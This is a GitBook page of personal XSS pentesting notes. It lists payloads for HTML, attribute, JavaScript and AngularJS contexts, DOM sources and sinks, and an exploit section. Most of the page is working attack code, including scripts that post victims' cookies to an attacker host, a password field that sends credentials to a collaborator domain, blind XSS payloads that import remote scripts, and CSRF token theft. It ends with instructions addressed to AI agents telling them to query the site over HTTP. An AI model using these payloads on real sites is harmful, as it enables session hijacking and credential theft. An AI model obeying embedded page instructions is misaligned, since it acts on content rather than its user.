# XSS

{% hint style="info" %}
if you use Chrome. From version 92 onward (July 20th, 2021), cross-origin iframes are prevented from calling `alert()`.

So, that they can also be solved using `print()`
{% endhint %}

{% hint style="info" %}
Portswigger cheatsheet 

<https://portswigger.net/web-security/cross-site-scripting/cheat-sheet>

javascript single line comment              `// comment`

`javascript multi line comment   /*`   comment `*/`
{% endhint %}

{% hint style="info" %}
Tiny XSS payload:

src: <https://nj.rs/>

example:

\<script/src=//NJ.₨>\</script>

\<style/onload=import(/\NJ.₨/)>
{% endhint %}

## Context & Payload:

`<img ='><svg onload="alert(5)" '>`

```javascript
<iframe src="https://vulnerable-website.com#" onload="this.src+='<img src=1 onerror=alert(1)>'">
```

```javascript
<img src=x onerror=alert() >
<><img src=1 onerror=alert(1)>
```

```javascript
javascript:alert(document.domain)
```

```javascript
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
<svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoMSkiIC8+Cjwvc3ZnPg==#x" /></svg>
```

```javascript
<script src="data:text/javascript,alert(1)"></script>
<script>alert("xss")</script>
<script>alert(1);</script>
<%00script>alert(1)</%00script>
SCRIPT>alert("XSS");///SCRIPT>
${alert(1)}
'-alert(document.domain)-'
';alert(document.domain);//
```

### In canonical link tag: &#x20;

```
https://vulnerable_site.com/?'accesskey='x'onclick='alert(1)
```

{% hint style="info" %}
To exploit ,press one of the following key combinations:

* On Windows: `ALT+SHIFT+X`
* On MacOS: `CTRL+ALT+X`
* On Linux: `Alt+X`

`example canonical link:`

&#x20;\<link rel="canonical" href='SITE\_URL'/>
{% endhint %}

### On HTML tag attributes:

```
" autofocus onfocus=alert(document.domain) x="
```

### On javascript variable:\*\*\*\*\*\*

{% tabs %}
{% tab title="JavaScript" %}

```javascript
</script><script>alert(document.domain);</script>
'-alert(document.domain)-'
';alert(document.domain);//
\';alert(document.domain)//
\'-alert(1)//
'},x=x=>{throw/**/onerror=alert,1337},toString=x,window+'',{x:'

```

{% endtab %}
{% endtabs %}

## without () and ":

```
onerror=alert;throw 1                  //when () is blocked..
?postId=5&'},x=x=>{throw/**/onerror=alert,1337},toString=x,window+'',{x:'

https://portswigger.net/research/xss-without-parentheses-and-semi-colons

```

## Reflacted XSS:

## Stored XSS:

## Blind XSS:

### Payload:

```javascript
'"><svg/onload=fetch(`//YOUR-COLLABORATOR-PAYLOAD/${encodeURIComponent(document.cookie)}`)>

<img src=x onerror=import('https://Your-xss-site/xss.js');//>

```

## DOM-based XSS:

### Example payload:

```url
http://www.example.com/test.html#<script>alert(1)</script>
```

### Popular Sources:

* `document.URL`
* `document.documentURI`
* `document.referrer`
* `location.href`
* `location.search`
* `location.*`
* `location.hash`
* `window.name`
* `window.location`

### Popular Sinks:

* `document.write()`
* &#x20;`document.writeln()`
* &#x20;`document.domain`&#x20;
* `element.innerHTML`     // use of `innerText` or `textContent` will remedies xss
* `element.outerHTML`
* &#x20;`element.insertAdjacentHTML`
* &#x20;`element.onevent`
* `element.src` (in certain elements)
* `eval`
* `setTimout`&#x20;
* &#x20;`setInterval`
* `execScript`

```bash
grep -r -E "document.URL|document.documentURI|document.referrer|location.href|location.search|location.hash|window.name|window.location" ./path/to/file
```

### jquery sinks:

* `add()`&#x20;
* `after()`&#x20;
* `append()`
* &#x20;`animate()`&#x20;
* `insertAfter()`
* &#x20;`insertBefore()`
* &#x20;`before()`
* &#x20;`html()`
* &#x20;`prepend()`
* &#x20;`replaceAll()`
* &#x20;`replaceWith()`
* &#x20;`wrap()`
* &#x20;`wrapInner()`
* &#x20;`wrapAll()`
* &#x20;`has()`
* &#x20;`constructor()`
* &#x20;`init()`&#x20;
* `index()`&#x20;
* `jQuery.parseHTML()`
* &#x20;`$.parseHTML()`
* `$()` selector sink.  like `$(window).on(.......`

## D**OM XSS in AngularJS:**

{% hint style="info" %}
If a framework like AngularJS is used, it may be possible to execute JavaScript without angle brackets or events. When a site uses the `ng-app` attribute on an HTML element, it will be processed by AngularJS. In this case, AngularJS will execute JavaScript inside double curly braces that can occur directly in HTML or inside attributes.\
...........portswigger.................
{% endhint %}

### How to Test:

1. Enter a random  string into your controllable source.
2. View the page source and observe that your random string is enclosed in an `ng-app` directive.
3. Enter the following AngularJS expression in the search box:

   ```javascript
   {{1 + 1}}
   {{$on.constructor('alert(1)')()}}   
   {{$eval.constructor('alert()')()}}
   {{$watch.constructor('alert()')()}}
   {{constructor.constructor('alert(document.cookie)')()}}
   ```

   <br>

## Example code and Payload:

```javascript
$(window).on('hashchange', function() {
	var element = $(location.hash);
	element[0].scrollIntoView();
});
```

```html
<iframe src="https://vulnerable-website.com#" onload="this.src+='<img src=1 onerror=alert(1)>'">
```

```javascript
function search(path) {
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
            eval('var searchResultsObj = ' + this.responseText);
            displaySearchResults(searchResultsObj);
        }
    };
    xhr.open("GET", path + window.location.search);
    xhr.send();
```

<pre class="language-javascript"><code class="lang-javascript">/?search=blah\"};alert();%20//
<strong>/?search=\"-prompt()}//
</strong>/?search=\"/alert()} //
</code></pre>

```javascript
   function escapeHTML(html) {
        return html.replace('<', '&lt;').replace('>', '&gt;');
    }
//vulnerable because if pattern is a string, then only the first occurrence will be replaced.
```

```javascript
<><img src=1 onerror=alert(1)>
```

<pre><code>&#x3C;script>
 var searchTerms = 'SEARCH_TERM';     // here vulnerability exist....
 document.write('&#x3C;img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
<strong>&#x3C;/script>
</strong></code></pre>

```
</script><script>alert(document.domain);</script>
'-alert(document.domain)-'
';alert(document.domain);//
```

## Exploit:

### To steal cookies:

```javascript
<script>
fetch('https://attacker_controll_site.com', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

//to get csrf token:
document.getElementsByName('csrf')[0].value;
```

```javascript
<script>
window.addEventListener('DOMContentLoaded', function(){

var token = document.getElementsByName('csrf')[0].value;
var data = new FormData();

data.append('csrf', token);
data.append('postId', 8);
data.append('comment', document.cookie);
data.append('name', 'victim');
data.append('email', 'example@email.com');
data.append('website', 'https://www.example.com');

fetch('/post/comment'.{
    method: 'POST',
    mode: 'no-cors',
    body: data    
});

});
</script>
```

### To capture passwords:

```javascript
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
```

### To perform CSRF:

```javascript
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
```

```javascript
<iframe src="https://vulnerable_site.net/?search=<body%20onresize=print()>" onload=this.style.width='100px'>
```

## Testing for Blind XSS:

* <https://bxsshunter.com/>
* <https://xss.report/dashboard>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://shahidulandshamim.gitbook.io/web-application/exploitation/xss.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.